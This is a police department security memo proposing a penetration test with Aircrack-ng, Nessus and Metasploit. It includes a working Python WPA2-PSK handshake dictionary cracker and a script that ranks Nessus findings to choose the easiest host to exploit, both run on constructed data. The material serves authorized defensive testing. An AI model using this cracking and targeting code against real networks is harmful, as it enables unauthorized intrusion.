As a result of the media exposure surrounding the City Police Department's new police chief hire, the data network that supports the department was targeted and compromised. Our examination so far has found that the data integrity of one of our servers has been compromised and that a plain-text file was placed on the server without our knowledge. Though the extent of the compromise has not yet been fully determined, it is my recommendation that we commission a third-party security organization to conduct an investigation and root-cause analysis; so that investigation has evidence to work with, the affected server should be imaged and preserved before any further testing touches it. In the meantime, management has decided on our initial response: we will begin a white-hat penetration test of our network infrastructure to identify and exploit any gaping security holes. Knowing what led to this compromise is of great importance, but it is even more important to find and close the security flaws so that we are not compromised again in the immediate future.
To undertake the task of conducting a penetration test to find the holes in our network infrastructure, we will need penetration testing tools. I have decided on the following three: Aircrack-ng, Nessus and Metasploit.
Descriptions and Limitations of Selected Tools
Aircrack-ng Aircrack-ng is a suite of wireless auditing and exploitation tools that lets an attacker gain entry to an organization's or individual's wireless network. According to Henry Dalziel of concise-courses.com, the suite is made up of several programs, including aircrack-ng (which recovers WEP keys and runs dictionary attacks against WPA/WPA2 handshakes), airdecap-ng (which decrypts WEP- or WPA-encrypted capture files), aireplay-ng (a packet injector), airodump-ng (a packet sniffer) and several others (http://www.concise-courses.com/security/top-ten-pentesting-tools/). Aircrack-ng is limited to infiltration and wireless network access: it gets you onto the network, but other tools are required to penetrate the hosts on it. One further caveat: against WPA/WPA2-PSK it performs an offline dictionary attack on a captured four-way handshake, so it succeeds only if the pre-shared key is in the wordlist.
Nessus Nessus is a vulnerability scanner. It probes a target's IP addresses and ports and compares what it finds (banners, service versions, configuration) against a database of plugins that describe known vulnerabilities. When a scan completes and a match is found, Nessus lists the discovered vulnerabilities, which can take the form of missing patches, default or common passwords, legacy services with publicly known exploits, or misconfigurations. Although Nessus does an excellent job of identifying potential attack paths against a target, its capabilities outside scanning are limited; it cannot exploit targets natively. Its biggest limitation, in my opinion, is its reliance on known signatures to trigger alerts: it can only find vulnerabilities it has been updated to recognize, which by definition excludes zero-day flaws.
Metasploit Metasploit is a framework and database of exploit code and supporting tools that helps security professionals and hobbyists alike explore and exploit computer weaknesses. It is one of the most popular, if not the most popular, security tools used by information security staff and penetration testers around the world. Its limitation is a steep learning curve: for the more complicated exploits you need an understanding of how the target software fails and working knowledge of a programming language or two (Metasploit modules are written in Ruby, and many memory-corruption exploits are easier to follow with some C or assembly) in order to get the most out of it.
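To make the "dictionary attack against a WPA/WPA2 handshake" concrete, the following is an added example in Python, not code from this memo or from the Aircrack-ng project. It reproduces the computation aircrack-ng performs for each candidate passphrase: derive the PMK with PBKDF2-HMAC-SHA1 over the SSID, expand it to the PTK with the 802.11i PRF, and check the candidate by recomputing the MIC of handshake message 2 with the KCK. The SSID, MAC addresses, nonces, EAPOL frame, "captured" MIC and wordlist are all constructed for the example; nothing was captured from a real network.

```python
"""Offline WPA2-PSK dictionary attack against a (constructed) four-way handshake capture."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return ptk[:16]  # the KCK is the first 128 bits of the PTK


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC zeroed)[:16]
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Return the candidate passphrase whose recomputed MIC matches the captured one, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_kck(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# ---- constructed capture: illustrative values only, not from a real network ----
SSID = "CityPD-Guest"
AP_MAC = bytes.fromhex("0011223344aa")
STA_MAC = bytes.fromhex("66778899bbcc")
ANONCE = bytes(range(32))        # AP nonce from handshake message 1
SNONCE = bytes(range(32, 64))    # station nonce from handshake message 2
# Handshake message 2 (EAPOL-Key, RSN descriptor) with its 16-byte MIC field zeroed,
# which is the form aircrack-ng hashes. The byte layout is illustrative.
EAPOL_MSG2 = (
    bytes.fromhex("0103005f")          # EAPOL version 1, type 3 (Key), body length 95
    + bytes.fromhex("02")              # descriptor type 2 (RSN)
    + bytes.fromhex("010a")            # key info: pairwise, MIC present, descriptor version 2
    + bytes.fromhex("0010")            # key length 16
    + bytes(8)                         # replay counter
    + SNONCE
    + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
    + bytes(16)                        # MIC field, zeroed for the computation
    + bytes.fromhex("0000")            # key data length 0
)
TRUE_PASSPHRASE = "police1234"   # constructed weak PSK that "protects" the sample network
CAPTURED_MIC = eapol_mic(
    derive_kck(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    EAPOL_MSG2,
)
WORDLIST = ["password", "12345678", "letmein!", "police1234", "citypd2024"]  # constructed


def demo(wordlist=WORDLIST):
    """Run the attack against the constructed capture; returns the recovered passphrase or None."""
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC, wordlist)


if __name__ == "__main__":
    print("recovered:", demo())
    print("with a wordlist that lacks the PSK:", demo(["password", "qwerty"]))
```

The cost per candidate is fixed by the 4096-iteration PBKDF2, which is why the attack is a wordlist race rather than a break of WPA2 itself: a passphrase that is not in the list (the second call above) is simply not found.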
Performing a network penetration test
By themselves, Aircrack-ng, Nessus and Metasploit do not have enough functionality to complete a penetration test, so we will use each of the three tools for a specific phase of the test.

To begin, I would use the Aircrack-ng suite to gain network access from outside the police station, in the manner of a war-driving attacker. Working from outside gives me a degree of anonymity (reducing my risk of being discovered) while giving me a reasonable chance to crack the WPA2 protection and enter the station's wireless network. Concretely, airodump-ng captures the four-way handshake between the access point and a client, aireplay-ng can deauthenticate a client to force a fresh handshake, and aircrack-ng then runs a dictionary attack against the capture. Success depends on the pre-shared key being in the wordlist; a long random passphrase will not fall to this approach.

Assuming everything goes as planned, once I have network access I would use the Nessus vulnerability scanner to map the network and search for vulnerable targets. Given a target address range, the scanner automatically discovers live hosts and collects banners, server versions, open ports and running protocols, then matches what it finds against the plugins in its database. When a match is found, Nessus reports the vulnerabilities for that host and ranks them by severity; the higher the severity, the greater the risk. Nessus also flags findings for which a public exploit or a Metasploit module exists. The hosts with high-severity findings and available exploits are the ones I will attack: the selected server should be the highest-value target that is the easiest to exploit.

That is where Metasploit becomes useful. I would search the Metasploit framework for the exploit module that matches the weakness Nessus discovered on the chosen server, set the module's target, payload and listener options for the network under test, and launch it. Once I have network access, a target and a matching exploit, the test proceeds from there. Every step, including the handshake capture from outside the building, must be covered by the written authorization and scope for the test.
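The target-selection step above (highest severity, available exploit, Metasploit module if possible) is easy to automate from the scanner's export. The following is an added example in Python, not code from this memo or from Tenable. It parses the .nessus v2 XML that Nessus exports, using the element and attribute names as I know them from that format (ReportHost, ReportItem with port/severity/pluginName attributes, cvss_base_score, exploit_available, metasploit_name); treat those names as an assumption and check them against your own export. The embedded document is constructed sample data with fake plugin IDs and names, not a real scan.

```python
"""Rank hosts from a (constructed) Nessus .nessus v2 export by severity and exploit availability."""
import xml.etree.ElementTree as ET
from collections import defaultdict

SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample export: three hosts, invented plugin IDs and names, no real findings.
SAMPLE_NESSUS = """<NessusClientData_v2>
 <Report name="cpd-internal-segment">
  <ReportHost name="10.10.5.20">
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="999001"
               pluginName="Constructed: SMB service with remotely exploitable flaw" pluginFamily="Windows">
    <cvss_base_score>10.0</cvss_base_score>
    <exploit_available>true</exploit_available>
    <metasploit_name>constructed/smb_rce</metasploit_name>
   </ReportItem>
   <ReportItem port="80" svc_name="www" protocol="tcp" severity="2" pluginID="999002"
               pluginName="Constructed: web server version disclosure" pluginFamily="Web Servers">
    <cvss_base_score>5.0</cvss_base_score>
    <exploit_available>false</exploit_available>
   </ReportItem>
  </ReportHost>
  <ReportHost name="10.10.5.21">
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="3" pluginID="999003"
               pluginName="Constructed: outdated SSH daemon with public exploit" pluginFamily="Misc.">
    <cvss_base_score>7.5</cvss_base_score>
    <exploit_available>true</exploit_available>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="999004"
               pluginName="Constructed: OS identification" pluginFamily="General"/>
  </ReportHost>
  <ReportHost name="10.10.5.22">
   <ReportItem port="0" svc_name="general" protocol="icmp" severity="1" pluginID="999005"
               pluginName="Constructed: ICMP timestamp disclosure" pluginFamily="General">
    <cvss_base_score>2.1</cvss_base_score>
    <exploit_available>false</exploit_available>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def parse_findings(xml_text):
    """Flatten a .nessus v2 document into one dict per ReportItem."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "severity": int(item.get("severity")),
                "plugin": item.get("pluginName"),
                "cvss": float(item.findtext("cvss_base_score", default="0")),
                "exploit_available": item.findtext("exploit_available", default="false") == "true",
                "metasploit_name": item.findtext("metasploit_name"),  # None when Nessus lists no module
            })
    return findings


def rank_hosts(findings):
    """Group findings per host and order hosts by attractiveness as the next target."""
    per_host = defaultdict(list)
    for f in findings:
        per_host[f["host"]].append(f)
    ranked = []
    for host, items in per_host.items():
        worst = max(items, key=lambda f: (f["severity"], f["cvss"]))
        ranked.append({
            "host": host,
            "max_severity": worst["severity"],
            "max_severity_name": SEVERITY_NAMES[worst["severity"]],
            "high_or_critical": sum(1 for f in items if f["severity"] >= 3),
            "exploitable": [f["plugin"] for f in items if f["exploit_available"]],
            "metasploit_modules": [f["metasploit_name"] for f in items if f["metasploit_name"]],
        })
    # Easiest to exploit first: a ready Metasploit module beats any public exploit,
    # which beats severity alone; ties broken by how many High/Critical findings the host has.
    ranked.sort(key=lambda r: (bool(r["metasploit_modules"]), bool(r["exploitable"]),
                               r["max_severity"], r["high_or_critical"]), reverse=True)
    return ranked


def pick_target(findings):
    """The memo's rule: the highest-ranked host that actually has an available exploit, else None."""
    for r in rank_hosts(findings):
        if r["exploitable"]:
            return r["host"]
    return None


if __name__ == "__main__":
    findings = parse_findings(SAMPLE_NESSUS)
    for r in rank_hosts(findings):
        print(r["host"], r["max_severity_name"], r["exploitable"], r["metasploit_modules"])
    print("first target:", pick_target(findings))
```

On the sample data the SMB host ranks first because it carries both a Critical finding and a named Metasploit module; the SSH host has a public exploit but no module, and the third host has nothing worth attacking, so it is never returned as a target.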
Conclusion
It is my professional recommendation that we move forward with acquiring these three testing tools as soon as possible. Our network has been compromised, and we have to take swift yet decisive action in order to adopt a more secure network environment.
Information Security Associate, City Police Department